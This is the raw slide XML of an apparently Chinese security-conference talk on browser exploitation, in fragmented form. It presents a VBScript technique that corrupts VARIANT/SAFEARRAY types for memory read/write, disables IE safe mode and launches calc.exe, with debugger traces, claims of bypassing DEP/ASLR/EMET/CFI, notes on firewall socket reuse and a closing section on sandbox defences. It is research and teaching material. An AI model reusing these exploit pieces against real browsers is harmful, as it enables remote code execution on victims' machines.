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8" r:id="rId4"/>
    <p:sldId id="279" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="293" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="303" r:id="rId15"/>
    <p:sldId id="301" r:id="rId16"/>
    <p:sldId id="295" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="283" r:id="rId19"/>
    <p:sldId id="304" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="300" r:id="rId23"/>
    <p:sldId id="292" r:id="rId24"/>
    <p:sldId id="297" r:id="rId25"/>
    <p:sldId id="298" r:id="rId26"/>
    <p:sldId id="299" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="258" r:id="rId3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46" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="119" d="100"/>
          <a:sy n="119" d="100"/>
        </p:scale>
        <p:origin x="-155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6C5B4-8ACC-644D-AC7D-0086FB65DF0D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85B68-CDDF-1040-86B8-1346FC9AA5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37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66610-5315-4FE5-AB87-ACE9F8D7C9B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19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30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11480" y="1638795"/>
            <a:ext cx="4114800" cy="4329380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin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697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100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="微软雅黑"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400">
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="微软雅黑"/>
              </a:defRPr>
            </a:lvl2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3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96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 typeface="Arial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3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11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18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 err="1" smtClean="0"/>
              <a:t>aaa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B147-278E-7C4C-ADDC-E6364B835175}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2014-5-30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198D-5831-0641-A449-91D6C2DD9ED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内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"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0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 typeface="Wingdings" charset="2"/>
        <a:buChar char="l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ppt模板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2925" y="1604329"/>
            <a:ext cx="7900035" cy="147002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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT 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高级漏洞利用技术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APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对抗时代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DEP+ASLR+EMET+CFI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如何对抗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ANTI APT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无关键代码缓存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无事后关键代码追踪线索</a:t>
            </a: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、旁路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无法分析关键代码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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高级漏洞利用技术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DVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>执行技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>97</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年两篇文章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注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用解释型语言与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码相结合的新型病毒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《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文本病毒（病毒新理论）！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>解释执行也是执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用漏洞增强指令集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>构造指针突破解释执行虚拟机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程代码执行转换成本地提权突破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94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突破点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关键通用的数据结构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Variant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等大量使用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唯一数据类型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内部仍然保留使用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1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tagVARIANT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的定义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143000"/>
            <a:ext cx="8174736" cy="432938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__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tagVARIANT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{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VARTYPE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WORD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wReserved1;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WORD wReserved2;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WORD wReserved3;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union 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{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LONGLONG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llVal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LONG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BYTE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SHORT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SAFEARRAY *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parray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unsigned short VARTYPE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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1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VARTYPE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列举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143000"/>
            <a:ext cx="8174736" cy="432938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VARENUM {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VT_EMPTY = 0,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VT_NULL = 1,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VT_I2 = 2,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VT_I4 = 3,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VT_R4 = 4,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VT_R8 = 5,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VT_BSTR = 8,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VT_VARIANT = 12,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VT_VECTOR = 0x1000,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VT_ARRAY = 0x2000,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VT_BYREF = 0x4000,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1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tagSAFEARRAY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143000"/>
            <a:ext cx="8174736" cy="432938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tagSAFEARRAY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USHORT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cDims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USHORT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fFeatures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ULONG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cbElements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ULONG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cLocks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PVOID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pvData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SAFEARRAYBOUND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rgsabound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[ 1 ];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} 	SAFEARRAY;</a:t>
            </a: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const USHORT FADF_HAVEVARTYPE= 0x0080;  /* array has a VT type */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const USHORT FADF_VARIANT    = 0x0800;  /* an array of VARIANTs */</a:t>
            </a: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tagSAFEARRAYBOUND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ULONG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cElements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LONG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lLbound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} 	SAFEARRAYBOUND;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1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具体利用实现细节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 smtClean="0"/>
              <a:t>通过漏洞修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VARTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>vt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vt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>得到需要的数组，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>c\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通过数组修改关键数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过修改保护模式实现控件加载</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过控件实现完全控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>脚本就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode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61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跟踪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>演示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9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&lt;SCRIPT LANGUAGE="VBScript"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="9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myarray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(01)&amp;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(2176)&amp;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(01)&amp;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 smtClean="0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 smtClean="0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(00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(32767)&amp;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(00)&amp;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chrw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(0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="9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document.write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vartype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myarray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))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="9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document.write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vartype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600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>myarray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(&amp;h7ffe0030)))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="9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跟踪过程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069848"/>
            <a:ext cx="8174736" cy="4898327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0:008:x86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vbscript!vbsvartype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Breakpoint 0 hit</a:t>
            </a:r>
          </a:p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VBSCRIPT!VbsVarType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0ffb31f8 8bff      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edi,edi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0:008:x86&gt; d  poi(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esp+c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l 10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00e8fa98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0c 40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4f 0b 00 00 c0 42-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78 5a 4f 0b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10 00 00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00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0:008:x86&gt; d  poi(poi(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esp+c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)+8) l 10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0b4f5a78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08 00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00 00 00 00 00 00-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04 fb f9 05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00 00 00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00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0:008:x86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 d 5f9fb04 l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18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05f9fb04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01 00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80 08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01 00 00 00-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00 00 00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00 00 00 00  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05f9fb14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7f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00 00 00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跟踪过程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61364" y="1311895"/>
            <a:ext cx="8982635" cy="4898327"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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0:008:x86&gt; e b4f5a78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0c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修改字符串变量为数组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0:008:x86&gt; g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Breakpoint 0 hit</a:t>
            </a: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VBSCRIPT!VbsVarType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0ffb31f8 8bff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edi,edi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0:008:x86&gt; d  poi(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esp+c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 l 10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00e8fa98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0c 40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50 0b dc 44 5e 06-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30 00 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7f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cc 46 5e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06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0:008:x86&gt; d 7ffe0030 l 20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7ffe0030  43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00  C.:.\.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W.i.n.d.o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7ffe0040  77 00 73 00 00 00 00 00-00 00 00 00 00 00 00 00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w.s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.............</a:t>
            </a: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Who am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 ?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 smtClean="0"/>
              <a:t>真名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袁仁广</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网名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yuange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漏洞实验室主任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北京奥运会特聘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信息安全专家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/>
              <a:t>中国国家信息安全漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>库特聘专家</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>98</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>win9x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络共享密码验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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多年的安全对抗经验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75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执行结果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8204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=0x200c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=0x0043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实现代码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0040" y="1143000"/>
            <a:ext cx="8238744" cy="4825175"/>
          </a:xfrm>
        </p:spPr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获得对象地址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sub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testaa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end sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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On Error Resume Next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testaa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	 	 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=null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(0)=0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aa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(a1)=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(0)=3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aa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(a1) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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end function </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5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实现代码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0040" y="1143000"/>
            <a:ext cx="8238744" cy="4825175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6200" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>修改保护模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>setnotsafemode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On Error Resume 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Next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5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5600" dirty="0" err="1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readmem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(i+8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readmem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(i+16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)       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j=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readmem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+&amp;h134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)                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for k=0 to &amp;h60 step 4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    j=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readmem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+&amp;h120+k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)   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	   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if(j=14) then         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writemem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+&amp;h120+k)      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Exit for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end if</a:t>
            </a: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next  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5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  end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5600" dirty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39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实现代码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56032" y="1755647"/>
            <a:ext cx="8650224" cy="42125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弹计算器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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>runcalc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>() 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On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Error Resume Next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>  set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createobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Shell.Application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sh.ShellExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"calc.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>function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070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代码效果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56032" y="1755647"/>
            <a:ext cx="8650224" cy="42125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09</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年完成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Bypass DEP+ASLR+EMET+CFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改过新出漏洞利用缓解措施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修改新出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上通用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修改新出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系统上通用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WIN95-WIN8.1+IE3-IE11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原理可以用于其它操作系统、其它芯片平台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762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代码效果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2219863"/>
            <a:ext cx="4114800" cy="3165987"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3004365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代码效果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951704"/>
            <a:ext cx="4114800" cy="3318257"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161448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防护技术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6576" y="1033272"/>
            <a:ext cx="8284464" cy="54469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漏洞利用缓解技术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DEP+ASLR+EMET+CFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>沙箱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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保护模式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降低权限，文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、网络、系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>调用能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用。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沙箱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限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用，文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网络不能使用，系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用还能使用。系统内核的漏洞可以突破沙箱。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9294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防护技术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/>
              <a:t>更完善的沙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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、沙瓶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里代码只有执行权限，无其它任何权限，不提供任何系统调用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、只能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过有限的瓶口接口调用外部，通过内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共享交换数据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、沙瓶里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的代码漏洞被完全屏蔽，漏洞只局限在有限的瓶口接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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9294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ppt模板-封底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1247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="liant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5330171"/>
            <a:ext cx="1132840" cy="1132840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="4c2da03f2642ce16182b3cd9295127c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6001838"/>
            <a:ext cx="1203960" cy="1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要点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/>
              <a:t>漏洞挖掘技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用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APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对抗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时代 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对抗技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防护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漏洞挖掘技术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/>
              <a:t>人工分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>程序自动化技术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Fuzzing技术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污点分析等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补丁比对技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>静态分析技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>动态分析技术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4747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漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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/>
              <a:t>完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>美、和谐的标准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满足各种网络需求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>只要求目标存在漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>稳定、可重复，不影响目标系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>可扩展、可对抗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>简单、通用、傻瓜化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对抗防火墙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数据通道技术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   client &lt;--&gt; proxy &lt;--&gt; fir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>wall &lt;--&gt;server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ecb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>ecb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>ReadClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>ecb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WriteC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" err="1"/>
              <a:t>lient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查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx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 err="1"/>
              <a:t>getpeername</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  字串匹配查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>socket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对抗防火墙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有线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的处理技术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en-US" altLang="zh-CN" dirty="0"/>
